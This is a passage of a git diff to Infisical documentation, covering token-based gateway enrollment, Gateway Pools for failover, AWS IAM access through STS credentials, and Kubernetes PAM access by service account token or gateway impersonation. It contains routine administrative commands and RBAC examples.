`INFISICAL_MACHINE_IDENTITY_ID=` - - - - Authentication using GCP identity tokens. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=gcp-id-token` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - - - Authentication using GCP service account keys. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=gcp-iam` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - `INFISICAL_GCP_SERVICE_ACCOUNT_KEY_FILE_PATH=` - - - - Authentication using Azure managed identity. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=azure` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - - - Authentication using OIDC identity tokens. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=oidc-auth` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - `INFISICAL_JWT=` - - - - Authentication using JWT tokens. - - **Environment Variables:** - - `INFISICAL_AUTH_METHOD=jwt-auth` - - `INFISICAL_MACHINE_IDENTITY_ID=` - - `INFISICAL_JWT=` - - - - Ensure a relay server is running and accessible before you deploy any gateways. You have two options: - - **Managed relay (Infisical Cloud, US/EU only):** Managed relays are only available for Infisical Cloud instances in the US and EU regions. If you are using Infisical Cloud in these regions, you can use the provided managed relay. - - **Self-hosted relay:** For all other cases, including all self-hosted and dedicated enterprise instances of Infisical, you must deploy your own relay server. You can also choose to deploy your own relay server when using Infisical Cloud if you require reduced geographic proximity to your target resources for lower latency or to reduce network congestion. For setup instructions, see the [Relay Deployment Guide](/documentation/platform/gateways/relay-deployment). + Ensure a relay server is running and accessible before you deploy any gateways. You have two options: + - **Managed relay (Infisical Cloud, US/EU only):** If you are using Infisical Cloud in the US or EU regions, you can use the provided managed relay. + - **Self-hosted relay:** For all other cases, you must deploy your own relay server. See the [Relay Deployment Guide](/documentation/platform/gateways/relay-deployment). + + + 1. Navigate to **Organization Settings > Networking > Gateways**. + 2. Click **Create Gateway**. + ![Create Gateway button](/images/platform/gateways/gateway-create-button.png) + 3. Enter a name for your gateway and select a relay (or use "Auto Select Relay"). + ![Create Gateway form](/images/platform/gateways/gateway-create-form.png) + 4. Choose your deployment method (CLI or systemd). + 5. Copy the generated CLI command. The command includes a one-time enrollment token that expires in 1 hour. - Make sure the Infisical CLI is installed on the machine or environment where you plan to deploy the gateway. The CLI is required for gateway installation and management. - - See the [CLI Installation Guide](/cli/overview) for instructions. + Make sure the Infisical CLI is installed on the target machine. See the [CLI Installation Guide](/cli/overview) for instructions. Ensure your network and firewall settings allow the gateway to connect to all required services. All connections are outbound only; no inbound ports need to be opened. @@ -114,85 +38,59 @@ To successfully deploy an Infisical Gateway for use, follow these steps in order If you are in a corporate environment with strict egress filtering, ensure outbound TCP 2222 to relay servers and outbound HTTPS 443 to Infisical API endpoints are allowed. - - The Infisical CLI is used to install and start the gateway in your chosen environment. The CLI provides commands for both production and development scenarios, and supports a variety of options/flags to configure your deployment. + + Run the command you copied from the UI on the target machine. This single command enrolls the gateway and starts it immediately. - To view all available flags and equivalent environment variables for gateway deployment, see the [Gateway CLI Command Reference](/cli/commands/gateway). - For production deployments on Linux servers, install the Gateway as a systemd service so that it runs securely in the background and automatically restarts on failure or system reboot: + For production deployments on Linux, install as a systemd service: ```bash - sudo infisical gateway systemd install --token --domain --name + sudo infisical gateway systemd install \ + --enroll-method=token \ + --token= \ + --domain= sudo systemctl start infisical-gateway ``` - - By default, the gateway connects to the most optimal relay. Use the `--target-relay-name` flag to manually specify a different relay server. - - The systemd install command requires a Linux operating system with root/sudo privileges. - - - For production deployments on Kubernetes clusters, install the Gateway using the Infisical Helm chart: - - #### Install the latest Helm Chart repository - - ```bash - helm repo add infisical-helm-charts 'https://dl.cloudsmith.io/public/infisical/helm-charts/helm/charts/' - helm repo update - ``` - - #### Create a Kubernetes Secret - - The gateway supports all identity authentication methods through environment variables: - - ```bash - kubectl create secret generic infisical-gateway-environment \ - --from-literal=INFISICAL_AUTH_METHOD=universal-auth \ - --from-literal=INFISICAL_UNIVERSAL_AUTH_CLIENT_ID= \ - --from-literal=INFISICAL_UNIVERSAL_AUTH_CLIENT_SECRET= \ - --from-literal=INFISICAL_GATEWAY_NAME= - ``` - - - By default, the gateway connects to the most optimal relay. Use the `--from-literal=INFISICAL_RELAY_NAME=` flag to manually specify a different relay server. - - - #### Install the Gateway - - ```bash - helm install infisical-gateway infisical-helm-charts/infisical-gateway - ``` - - - For development or testing environments: - + For development or testing, run directly in the foreground: ```bash - sudo infisical gateway start --token --name= + infisical gateway start my-gateway \ + --enroll-method=token \ + --token= \ + --domain= ``` - - - By default, the gateway connects to the most optimal relay. Use the `--target-relay-name` flag to manually specify a different relay server. - - + + The enrollment token can only be used once and expires after 1 hour. If it expires, use the **Re-enroll** option in the gateway's context menu to generate a new one. + + + + You can safely re-run the same command to restart the gateway. It will detect the token has already been used and skip enrollment automatically. + + After deployment, verify your gateway is working: + 1. **Check logs** for "Gateway started successfully" message. + 2. **Verify registration** in the Infisical UI. Navigate to **Networking > Gateways** and confirm the gateway shows a "Healthy" status. + 3. **Test connectivity** by creating a resource that uses the gateway to access a private service. + + - 1. **Check logs** for "Gateway started successfully" message indicating the gateway is running and connected to the relay +### Re-enrollment - 2. **Verify registration** in the Infisical by visiting the Gateways section of your organization. The new gateway should appear with a recent heartbeat timestamp. +To move a gateway to a different machine or regenerate its credentials: - 3. **Test connectivity** by creating a resource in Infisical that uses the gateway to access a private service. Verify the resource can successfully connect through the gateway. - - +1. Click the context menu (three dots) next to the gateway and select **Re-enroll**. +2. Copy the new CLI command and run it on the new machine. +3. The existing gateway continues running until the new machine enrolls. Once the new machine connects, the old machine's credentials are automatically revoked. This enables zero-downtime machine migrations. ## Frequently Asked Questions @@ -234,11 +132,7 @@ If the gateway cannot connect to the relay: -If you encounter authentication failures: - -1. Verify machine identity credentials are correct -2. Check token expiration and renewal -3. Ensure authentication method is properly configured +Ensure the enrollment token has not expired or already been used. If the gateway was re-enrolled, the old machine's credentials are no longer valid. You can generate a new enrollment token using the **Re-enroll** option in the gateway's context menu. @@ -248,15 +142,24 @@ Check gateway logs for detailed error information: ```bash sudo journalctl -u infisical-gateway -f ``` -- **Kubernetes:** - ```bash - kubectl logs deployment/infisical-gateway - ``` - **Local installation:** Logs appear in the terminal where you started the gateway - -For systemd-based installations, the gateway's configuration file is stored at `/etc/infisical/gateway.conf`. You may reference or inspect this file for troubleshooting advanced configuration issues. + +Enrollment tokens expire after 1 hour. If the token expires before you run the CLI command, click the context menu (three dots) next to the gateway and select **Re-enroll** to generate a new token. + + + +Each gateway's access token and domain are saved to a config file scoped by gateway name: + +- **Running as root/sudo:** `/etc/infisical/gateways/.conf` +- **Running as a regular user:** `~/.infisical/gateways/.conf` + +This allows multiple gateways to run on the same machine without conflicting. For systemd-based installations, the configuration is at `/etc/infisical/gateway.conf`. All config files are created with restricted permissions (0600) so only the owner can read them. + + + +Yes. Each gateway stores its credentials in a separate config file scoped by name (e.g., `~/.infisical/gateways/my-gateway.conf`). You can enroll and start multiple gateways in separate terminal sessions using different names. diff --git a/docs/documentation/platform/gateways/gateway-pools.mdx b/docs/documentation/platform/gateways/gateway-pools.mdx new file mode 100644 index 00000000000..271241740ca --- /dev/null +++ b/docs/documentation/platform/gateways/gateway-pools.mdx @@ -0,0 +1,89 @@ +--- +title: "Gateway Pools" +sidebarTitle: "Gateway Pools" +description: "High availability and automatic failover for gateways" +--- + +Gateway Pools provide high availability for your gateway infrastructure. A pool is a named collection of gateways that all have connectivity to the same private network. When the platform needs to reach a resource through a pool, it automatically routes through a healthy gateway, providing failover if any individual gateway goes down. + + + Gateway Pools is an enterprise feature. Self-hosted users can contact + [sales@infisical.com](mailto:sales@infisical.com) to purchase an enterprise + license. + + +## How It Works + +1. You create a Gateway Pool and add multiple gateways that share network access to the same resources. +2. When configuring a consumer (e.g., Kubernetes Auth), you select the pool instead of an individual gateway. +3. At request time, the platform picks a random healthy gateway from the pool and routes through it. +4. If a gateway goes down, subsequent requests automatically route through the remaining healthy gateways. + +A gateway is considered healthy if it has sent a heartbeat within the last hour and its last health check did not fail. + +## Creating a Gateway Pool + +1. Navigate to **Organization Settings > Networking > Gateways**. +2. Click the **Gateway Pools** tab. + +![Gateway Pools Switch](../../../images/platform/gateways/gateway-pools-switch.png) + +3. Click **Create Pool**. + +![Gateway Pools Tab](../../../images/platform/gateways/gateway-pools-tab.png) + +4. Enter a name for the pool and click **Create Pool**. + +![Create Gateway Pool](../../../images/platform/gateways/gateway-pools-create.png) + +## Adding Gateways to a Pool + +1. In the **Gateway Pools** tab, click on a pool to open its detail view. + +![Click on a pool](../../../images/platform/gateways/gateway-pools-click-pool.png) + +2. Click **Add Gateway** and select a gateway from the dropdown. + +![Add gateway to pool](../../../images/platform/gateways/gateway-pools-add-gateway.png) + +3. Repeat for each gateway you want to add. + +A gateway can belong to multiple pools if it has connectivity to resources served by each pool. Pool membership can be changed at any time without restarting the gateway. + +## Using a Pool in a Consumer Config + +Anywhere you configure a gateway, the gateway picker dropdown shows both individual gateways and gateway pools. Pools are listed under the "Gateway Pools" section with an **HA** (high availability) badge and health status. + +When you select a pool, the platform validates connectivity through one of its healthy gateways before saving. + +## Gateway Selection + +When a request is routed through a pool, the platform picks a gateway at random from the pool's healthy gateways. There is no round-robin or weighted selection. + +## Pool Health + +Each pool displays an aggregate health status based on its gateways: + +- **Green** (e.g., "3/3 healthy") - All gateways are healthy +- **Yellow** (e.g., "2/3 healthy") - Some gateways are unhealthy +- **Red** (e.g., "0/3 healthy") - All gateways are unhealthy + +If all gateways in a pool are unhealthy when a request is made, the request fails with a descriptive error. + +## FAQ + + + + No. A pool cannot be deleted if it is referenced by any consumer configurations (e.g., Kubernetes Auth). You must first update those configurations to use a different gateway or pool before deleting. + + + Each pool shows a count of connected consumer configurations in the table. Click the count to see the full list with links to each resource. + + + The request fails with a descriptive error. You should ensure at least one gateway in the pool is online and has a recent heartbeat. + + + Yes. A gateway can belong to as many pools as needed, as long as it has connectivity to the resources served by each pool. + + + diff --git a/docs/documentation/platform/gateways/overview.mdx b/docs/documentation/platform/gateways/overview.mdx index 33945337b69..b3f77efe4ee 100644 --- a/docs/documentation/platform/gateways/overview.mdx +++ b/docs/documentation/platform/gateways/overview.mdx @@ -65,6 +65,10 @@ To monitor their operational status, both gateways and relays transmit hourly he Infisical automatically notifies all organization admins of unhealthy gateway or relay statuses through email and in-app notifications. +## High Availability with Gateway Pools + +For production workloads, you can group multiple gateways into a **Gateway Pool** to provide automatic failover. When a gateway in a pool goes down, the platform routes through a healthy member automatically. See [Gateway Pools](/documentation/platform/gateways/gateway-pools) for details. + ## Getting Started Ready to set up your gateway? Follow the guides below. @@ -73,11 +77,14 @@ Ready to set up your gateway? Follow the guides below. Deploy and configure your gateway within your network infrastructure. + + Set up high availability with gateway pools for automatic failover. + + + Set up relay servers if using self-deployed infrastructure. - - Learn about the security model and implementation best practices. diff --git a/docs/documentation/platform/groups.mdx b/docs/documentation/platform/groups.mdx index 70d39dafc2f..4c9a8828a4b 100644 --- a/docs/documentation/platform/groups.mdx +++ b/docs/documentation/platform/groups.mdx @@ -12,7 +12,7 @@ description: "Manage groups containing users and machine identities in Infisical ## Concept -A group is a collection of identities (users and/or machine identities) that you can create in an Infisical organization to more efficiently manage permissions and access control for multiple identities together. For example, you can have a group called `Developers` with the `Developer` role containing all the developers in your organization, or a group called `CI/CD Identities` containing all the machine identities used in your CI/CD pipelines. +A group is a collection of identities (users and/or machine identities) that you can create in an Infisical organization to more efficiently manage permissions and access control for multiple identities together. For example, you can have a group called `Members` with the `Member` role containing all the members in your organization, or a group called `CI/CD Identities` containing all the machine identities used in your CI/CD pipelines. Groups have the following properties: diff --git a/docs/documentation/platform/identities/kubernetes-auth.mdx b/docs/documentation/platform/identities/kubernetes-auth.mdx index f9412b92b19..eeefb5d30e9 100644 --- a/docs/documentation/platform/identities/kubernetes-auth.mdx +++ b/docs/documentation/platform/identities/kubernetes-auth.mdx @@ -207,6 +207,8 @@ In the following steps, we explore how to create and use identities for your app To configure your Kubernetes Auth method to use the gateway as the token reviewer, set the `Review Method` to "Gateway as Reviewer", and select the gateway you want to use as the token reviewer. + You can select either an individual gateway or a **Gateway Pool** for automatic failover. When a pool is selected, the platform routes through a healthy gateway at request time. See [Gateway Pools](/documentation/platform/gateways/gateway-pools) for more details. + ![identities organization create kubernetes auth method](/images/platform/identities/identities-kubernetes-auth-gateway-as-reviewer.png) diff --git a/docs/documentation/platform/identities/universal-auth.mdx b/docs/documentation/platform/identities/universal-auth.mdx index 18b847a4037..c99d5fa054a 100644 --- a/docs/documentation/platform/identities/universal-auth.mdx +++ b/docs/documentation/platform/identities/universal-auth.mdx @@ -177,8 +177,6 @@ using the Universal Auth authentication method. In many automated, cloud-native, or ephemeral environments (such as VMs, containers, or serverless functions), it is often unsafe or impractical to hard-code long-lived credentials for bootstrapping access to secrets management systems. The "secret zero" problem refers to the challenge of securely providing a workload with its initial credential, without manual intervention or static secrets that could be leaked or reused. Periodic tokens in Universal Auth are designed to solve this problem by enabling secure, automated bootstrapping and ongoing access renewal, even in dynamic or short-lived environments. -A common challenge in cloud-native and automated environments is the "secret zero" problem: how to securely bootstrap a workload (such as a VM, container, or serverless function) with its first credential, without hard-coding static secrets or requiring manual intervention. - **Periodic tokens** in Universal Auth solve this by allowing you to issue an access token that can be continuously renewed by your workload before it expires (i.e., a client-initiated rotation mechanism): - When you set the **Access Token Period** in the Universal Auth configuration, the issued access token can be renewed by your workload for the specified period (in seconds). diff --git a/docs/documentation/platform/pam/getting-started/resources/aws-iam.mdx b/docs/documentation/platform/pam/getting-started/resources/aws-iam.mdx index 58b58a81383..8975098a78d 100644 --- a/docs/documentation/platform/pam/getting-started/resources/aws-iam.mdx +++ b/docs/documentation/platform/pam/getting-started/resources/aws-iam.mdx @@ -1,14 +1,14 @@ --- title: "AWS IAM" sidebarTitle: "AWS IAM" -description: "Learn how to configure AWS Management Console access through Infisical PAM for secure, audited, and just-in-time access to AWS." +description: "Learn how to configure AWS access through Infisical PAM for secure, audited, and just-in-time access to AWS, covering both the AWS CLI and the Management Console." --- -Infisical PAM supports secure, just-in-time access to the **AWS Management Console** through federated sign-in. This allows your team to access AWS without sharing long-lived credentials, while maintaining a complete audit trail of who accessed what and when. +Infisical PAM supports secure, just-in-time access to AWS through STS role chaining. Each access request issues short-lived credentials that can be used directly with the **AWS CLI** or exchanged for a federated **AWS Management Console** sign-in URL. Both come from the same session, so there's no duplication and CloudTrail attribution stays consistent. ## How It Works -Unlike database or SSH resources that require a Gateway for network connectivity, AWS Console access works differently. Infisical uses AWS STS (Security Token Service) to assume roles on your behalf and generates temporary federated sign-in URLs. +Unlike database or SSH resources that require a Gateway for network connectivity, AWS access works differently. Infisical uses AWS STS (Security Token Service) to assume roles on your behalf and returns the temporary credentials. Those credentials are usable directly by the AWS CLI, and can also be exchanged for a federated console sign-in URL on demand. ```mermaid sequenceDiagram @@ -229,9 +229,9 @@ A PAM Account represents a specific Target Role that users can request access to -## Access the AWS Console +## Access AWS -Once your resource and accounts are configured, users can request access through Infisical: +Once your resource and accounts are configured, users can request access through Infisical. A single access request creates one session whose credentials power both the CLI and (optionally) the console. Clicking **Open in AWS Console** does not start a separate session. ![Create AWS IAM Resource](/images/pam/resources/aws-iam/access-account.png) @@ -241,18 +241,47 @@ Once your resource and accounts are configured, users can request access through - In the resource’s accounts section, find the AWS Console account you want to access. + In the resource's accounts section, find the AWS account you want to access. - Click the **Access** button for that account. + Click the **Access** button for that account. Infisical will: - Infisical will: 1. Assume the Resource Role using your project's External ID 2. Assume the Target Role using role chaining - 3. Generate a federated sign-in URL - 4. Open the AWS Console in a new browser tab + 3. Return the temporary STS credentials to your browser - The user will be signed into the AWS Console with the permissions of the Target Role. + The credentials shown are valid until the configured session duration expires. + + + + The access dialog shows three fields with copy buttons: + + - **Access Key ID** + - **Secret Access Key** + - **Session Token** + + Use them however your tooling expects. Common options: + + - Export as environment variables (Bash / Zsh): + ```bash + export AWS_ACCESS_KEY_ID=ASIA... + export AWS_SECRET_ACCESS_KEY=... + export AWS_SESSION_TOKEN=... + ``` + - Equivalent `$env:` assignments in PowerShell + - Append to a named profile in `~/.aws/credentials`: + ```ini + [infisical-pam] + aws_access_key_id = ASIA... + aws_secret_access_key = ... + aws_session_token = ... + ``` + + All standard AWS SDKs and tooling will pick up the credentials automatically once they are in the environment or credentials file. + + + + Click **Open in AWS Console** at the bottom of the access dialog. Infisical exchanges the same STS credentials for a federated sign-in URL and opens it in a new tab. No second session is created, and CloudTrail attribution stays consistent with your CLI activity. \ No newline at end of file diff --git a/docs/documentation/platform/pam/getting-started/resources/kubernetes.mdx b/docs/documentation/platform/pam/getting-started/resources/kubernetes.mdx index 1a9d7d1a3d6..1b4e421717d 100644 --- a/docs/documentation/platform/pam/getting-started/resources/kubernetes.mdx +++ b/docs/documentation/platform/pam/getting-started/resources/kubernetes.mdx @@ -4,11 +4,18 @@ sidebarTitle: "Kubernetes" description: "Learn how to configure Kubernetes cluster access through Infisical PAM for secure, audited, and just-in-time access to your Kubernetes clusters." --- -Infisical PAM supports secure, just-in-time access to Kubernetes clusters through service account token authentication. This allows your team to access Kubernetes clusters without sharing long-lived credentials, while maintaining a complete audit trail of who accessed what and when. +Infisical PAM supports secure, just-in-time access to Kubernetes clusters. Your team can access Kubernetes clusters without sharing long-lived credentials, while maintaining a complete audit trail of who accessed what and when. + +There are two ways to authenticate: + +- **Service Account Token** β€” you provide a static token that the Gateway injects into requests. Simple to set up, but the token is long-lived and stored in Infisical. +- **Gateway** β€” the Gateway uses its own pod identity and [Kubernetes impersonation](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) to act as a target service account. No tokens are stored in Infisical β€” you only provide a service account name and namespace. ## How It Works -Kubernetes access in Infisical PAM uses an Infisical Gateway to securely proxy connections to your Kubernetes API server. When a user requests access, Infisical generates a temporary kubeconfig that routes traffic through the Gateway, enabling secure access without exposing your cluster directly. +### Service Account Token + +When using a service account token, the Gateway forwards kubectl requests to the Kubernetes API server using the provided token. ```mermaid sequenceDiagram @@ -31,15 +38,46 @@ sequenceDiagram CLI-->>User: kubectl output ``` +### Gateway (Impersonation) + +When using Gateway auth, the Gateway authenticates as itself using its own pod service account, then tells the Kubernetes API to treat the request as if it came from the target service account. + +```mermaid +sequenceDiagram + participant User + participant CLI as Infisical CLI + participant Infisical + participant Gateway as Infisical Gateway + participant K8s as Kubernetes API Server + + User->>CLI: Request Kubernetes access + CLI->>Infisical: Authenticate & request session + Infisical-->>CLI: Session credentials & Gateway info + CLI->>CLI: Start local proxy + CLI->>Gateway: Establish secure tunnel + Gateway->>Infisical: Fetch session credentials (SA name + namespace) + User->>CLI: kubectl commands + CLI->>Gateway: Proxy kubectl requests + Gateway->>K8s: Forward with own token + Impersonate-User header + K8s->>K8s: Verify impersonation permission, apply target SA's RBAC + K8s-->>Gateway: Response + Gateway-->>CLI: Return response + CLI-->>User: kubectl output +``` + +No tokens are stored in Infisical. The Gateway reads its own pod token from the filesystem (auto-mounted by Kubernetes) and auto-discovers the Kubernetes API server from environment variables. + ### Key Concepts 1. **Gateway**: An Infisical Gateway deployed in your network that can reach the Kubernetes API server. The Gateway handles secure communication between users and your cluster. 2. **Service Account Token**: A Kubernetes service account token that grants access to the cluster. This token is stored securely in Infisical and used by the Gateway to authenticate with the Kubernetes API. -3. **Local Proxy**: The Infisical CLI starts a local proxy on your machine that intercepts kubectl commands and routes them securely through the Gateway to your cluster. +3. **Impersonation**: A Kubernetes feature where one identity (the Gateway) can act on behalf of another (the target service account). The Gateway authenticates as itself and adds `Impersonate-User` headers. Kubernetes checks if the Gateway has permission to impersonate the target, then applies the target's RBAC rules. + +4. **Local Proxy**: The Infisical CLI starts a local proxy on your machine that intercepts kubectl commands and routes them securely through the Gateway to your cluster. -4. **Session Tracking**: All access sessions are logged, including when the session was created, who accessed the cluster, session duration, and when it ended. +5. **Session Tracking**: All access sessions are logged, including when the session was created, who accessed the cluster, session duration, and when it ended. ### Session Tracking @@ -59,11 +97,13 @@ Infisical tracks: Before configuring Kubernetes access in Infisical PAM, you need: 1. **Infisical Gateway** - A Gateway deployed in your network with access to the Kubernetes API server -2. **Service Account** - A Kubernetes service account with appropriate RBAC permissions -3. **Infisical CLI** - The Infisical CLI installed on user machines +2. **Infisical CLI** - The Infisical CLI installed on user machines +3. Depending on your auth method: + - **Service Account Token**: A Kubernetes service account with appropriate RBAC permissions and a static token + - **Gateway**: The Gateway must be deployed **inside the Kubernetes cluster** as a pod, with a ClusterRole that allows impersonation of target service accounts - **Gateway Required**: Unlike AWS Console access, Kubernetes access requires an Infisical Gateway to be deployed and registered with your Infisical instance. The Gateway must have network connectivity to your Kubernetes API server. + **Gateway Required**: Kubernetes access requires an Infisical Gateway to be deployed and registered with your Infisical instance. For Gateway auth, the Gateway must be running as a pod inside the cluster. ## Create the PAM Resource @@ -79,90 +119,186 @@ The PAM Resource represents the connection between Infisical and your Kubernetes 1. Navigate to your PAM project and go to the **Resources** tab 2. Click **Add Resource** and select **Kubernetes** 3. Enter a name for the resource (e.g., `production-k8s`, `staging-cluster`) - 4. Enter the **Kubernetes API Server URL** - the URL to your Kubernetes API endpoint (e.g.`https://kubernetes.example.com:6443`) + 4. Enter the **Kubernetes API Server URL** - the URL to your Kubernetes API endpoint (e.g.`https://kubernetes.example.com:6443`). If using Gateway auth with an in-cluster gateway, use `https://kubernetes.default.svc.cluster.local`. 5. Select the **Gateway** that has access to this cluster 6. Configure SSL verification options if needed - **SSL Verification**: You may need to disable SSL verification if your Kubernetes API server uses a self-signed certificate or if the certificate's hostname doesn't match the URL you're using to access it. + **SSL Verification**: You may need to disable SSL verification if your Kubernetes API server uses a self-signed certificate or an in-cluster CA. For Gateway auth with `https://kubernetes.default.svc.cluster.local`, disable SSL verification here β€” the Gateway will use strict TLS with the in-cluster CA certificate during sessions. -## Create a Service Account - -Infisical PAM currently supports service account token authentication for Kubernetes. You'll need to create a service account with appropriate permissions in your cluster. - - - - Create a file named `sa.yaml` with the following content: - - ```yaml sa.yaml - apiVersion: v1 - kind: ServiceAccount - metadata: - name: infisical-pam-sa - namespace: kube-system - --- - # Bind the ServiceAccount to the desired ClusterRole - # This example uses cluster-admin - adjust based on your needs - apiVersion: rbac.authorization.k8s.io/v1 - kind: ClusterRoleBinding - metadata: - name: infisical-pam-binding - subjects: - - kind: ServiceAccount - name: infisical-pam-sa - namespace: kube-system - roleRef: - kind: ClusterRole - name: cluster-admin # Change this to a more restrictive role as needed - apiGroup: rbac.authorization.k8s.io - --- - # Create a static, non-expiring token for the ServiceAccount - apiVersion: v1 - kind: Secret - metadata: - name: infisical-pam-sa-token - namespace: kube-system - annotations: - kubernetes.io/service-account.name: infisical-pam-sa - type: kubernetes.io/service-account-token - ``` - - - **Security Best Practice**: The example above uses `cluster-admin` for simplicity. In production environments, you should create custom ClusterRoles or Roles with the minimum permissions required for each use case. - - - - - Apply the configuration to your cluster: - - ```bash - kubectl apply -f sa.yaml - ``` - - This creates: - - A ServiceAccount named `infisical-pam-sa` in the `kube-system` namespace - - A ClusterRoleBinding that grants the service account its permissions - - A Secret containing a static, non-expiring token for the service account - - - - Get the service account token that you'll use when creating the PAM account: - - ```bash - kubectl -n kube-system get secret infisical-pam-sa-token -o jsonpath='{.data.token}' | base64 -d - ``` - - Copy this token - you'll need it in the next step. - - +## Set Up Authentication + +Choose one of the two authentication methods below based on your setup. + + + + Use this method when you have a static service account token, or when the Gateway is not running inside the Kubernetes cluster. + + ### Create a Service Account + + + + Create a file named `sa.yaml` with the following content: + + ```yaml sa.yaml + apiVersion: v1 + kind: ServiceAccount + metadata: + name: infisical-pam-sa + namespace: kube-system + --- + # Bind the ServiceAccount to the desired ClusterRole + # This example uses cluster-admin - adjust based on your needs + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRoleBinding + metadata: + name: infisical-pam-binding + subjects: + - kind: ServiceAccount + name: infisical-pam-sa + namespace: kube-system + roleRef: + kind: ClusterRole + name: cluster-admin # Change this to a more restrictive role as needed + apiGroup: rbac.authorization.k8s.io + --- + # Create a static, non-expiring token for the ServiceAccount + apiVersion: v1 + kind: Secret + metadata: + name: infisical-pam-sa-token + namespace: kube-system + annotations: + kubernetes.io/service-account.name: infisical-pam-sa + type: kubernetes.io/service-account-token + ``` + + + **Security Best Practice**: The example above uses `cluster-admin` for simplicity. In production environments, you should create custom ClusterRoles or Roles with the minimum permissions required for each use case. + + + + + Apply the configuration to your cluster: + + ```bash + kubectl apply -f sa.yaml + ``` + + This creates: + - A ServiceAccount named `infisical-pam-sa` in the `kube-system` namespace + - A ClusterRoleBinding that grants the service account its permissions + - A Secret containing a static, non-expiring token for the service account + + + + Get the service account token that you'll use when creating the PAM account: + + ```bash + kubectl -n kube-system get secret infisical-pam-sa-token -o jsonpath='{.data.token}' | base64 -d + ``` + + Copy this token - you'll need it in the next step. + + + + + + Use this method when the Gateway is deployed **inside the Kubernetes cluster** as a pod. No tokens need to be created or stored β€” the Gateway uses its own pod identity to impersonate target service accounts. + + + When creating the resource in the step above, use `https://kubernetes.default.svc.cluster.local` as the URL and **disable SSL verification**. The Gateway handles TLS with the correct in-cluster CA automatically during sessions. + + + ### Set Up Impersonation Permissions + + The Gateway's pod service account needs a ClusterRole that allows it to impersonate the target service accounts. + + + + Create a file named `gateway-impersonation.yaml`: + + ```yaml gateway-impersonation.yaml + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRole + metadata: + name: infisical-gateway-impersonator + rules: + - apiGroups: [""] + resources: ["serviceaccounts"] + verbs: ["impersonate"] + resourceNames: + - "deploy-bot" # Add each SA the gateway should be able to impersonate + - "ci-runner" + - apiGroups: [""] + resources: ["groups"] + verbs: ["impersonate"] + resourceNames: + - "system:serviceaccounts" + - "system:serviceaccounts:default" # Match the namespace(s) of the target SAs + - "system:authenticated" + --- + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRoleBinding + metadata: + name: infisical-gateway-impersonator-binding + subjects: + - kind: ServiceAccount + name: # The Gateway pod's own service account + namespace: + roleRef: + kind: ClusterRole + name: infisical-gateway-impersonator + apiGroup: rbac.authorization.k8s.io + ``` + + + **Scoped by `resourceNames`**: The `resourceNames` field limits which service accounts the Gateway can impersonate. If someone creates a PAM account pointing at a service account not in this list, the session will fail with a 403 from Kubernetes. This is how you control which accounts are accessible through Infisical. + + + + + ```bash + kubectl apply -f gateway-impersonation.yaml + ``` + + + + The service accounts you want to impersonate must already exist in the cluster with their own RBAC permissions. For example: + + ```yaml + apiVersion: v1 + kind: ServiceAccount + metadata: + name: deploy-bot + namespace: default + --- + apiVersion: rbac.authorization.k8s.io/v1 + kind: ClusterRoleBinding + metadata: + name: deploy-bot-binding + subjects: + - kind: ServiceAccount + name: deploy-bot + namespace: default + roleRef: + kind: ClusterRole + name: view # Or whatever permissions this SA should have + apiGroup: rbac.authorization.k8s.io + ``` + + The target SA's own RBAC rules determine what the user can do during the session. + + + + ## Create PAM Accounts -Once you have configured the PAM resource, you'll need to configure a PAM account for your Kubernetes resource. -A PAM Account represents a specific service account that users can request access to. You can create multiple accounts per resource, each with different permission levels. +Once you have configured the PAM resource and set up authentication, create a PAM account to grant access. @@ -173,8 +309,11 @@ A PAM Account represents a specific service account that users can request acces Click **Add Account**. - - Fill in the account details and paste the service account token you retrieved earlier. + + Choose the authentication method: + + - **Service Account Token** β€” paste the service account token you retrieved earlier. + - **Gateway** β€” enter the **Service Account Name** and **Namespace** of the Kubernetes service account you want to impersonate. No token is needed. @@ -185,7 +324,7 @@ Once your resource and accounts are configured, users can request access through 1. Navigate to the **Resources** tab in your PAM project and open the Kubernetes resource - 2. In the resource’s accounts section, find the account you want to access + 2. In the resource's accounts section, find the account you want to access 3. Click the **Access** button for that account 4. Copy the provided CLI command @@ -222,3 +361,36 @@ Once your resource and accounts are configured, users can request access through You can view session logs in the **Sessions** page of your PAM project. + +## FAQ + + + + - Use **Gateway** if your Gateway is deployed as a pod inside the Kubernetes cluster. No tokens to create or manage β€” just enter a service account name and namespace. + - Use **Service Account Token** if your Gateway runs outside the cluster (e.g., on a separate VM) and only has network access to the Kubernetes API. You'll need to create a service account token and paste it into Infisical. + + + + Yes. The resource URL is still required even when using Gateway auth. For in-cluster gateways, enter `https://kubernetes.default.svc.cluster.local`. The Gateway auto-discovers the actual Kubernetes API address from its pod environment variables, so this URL isn't used for the connection itself β€” but the field is still required when creating the resource. + + + + When using Gateway auth, the Gateway reads the `KUBERNETES_SERVICE_HOST` and `KUBERNETES_SERVICE_PORT_HTTPS` environment variables that Kubernetes automatically sets in every pod. It ignores the URL configured on the resource and connects directly to the in-cluster API server. + + + + Just disable SSL verification on the resource β€” the Gateway handles TLS automatically during sessions using the in-cluster CA certificate mounted in its pod. If the CA certificate is missing or invalid, the session will fail rather than falling back to an insecure connection. + + + + The Kubernetes API server returns a 403 Forbidden error. Kubernetes itself enforces impersonation permissions β€” if the Gateway's ClusterRole doesn't include the target service account in its `resourceNames` list, the session fails. You don't need to configure any allowlist in Infisical; just update the ClusterRole in your cluster. + + + + Yes. The auth method is configured per account, not per resource. You can have some accounts using Service Account Token and others using Gateway on the same Kubernetes resource. + + + + For Gateway auth, yes β€” the Gateway must be deployed as a pod inside the cluster so it can read its own service account token and reach the Kubernetes API. For Service Account Token auth, the Gateway just needs network access to the Kubernetes API server and can run anywhere. + + diff --git a/docs/documentation/platform/pam/product-reference/account-policies.mdx b/docs/documentation/platform/pam/product-reference/account-policies.mdx index 8333f2f86b2..5baf51880ab 100644 --- a/docs/documentation/platform/pam/product-reference/account-policies.mdx +++ b/docs/documentation/platform/pam/product-reference/account-policies.mdx 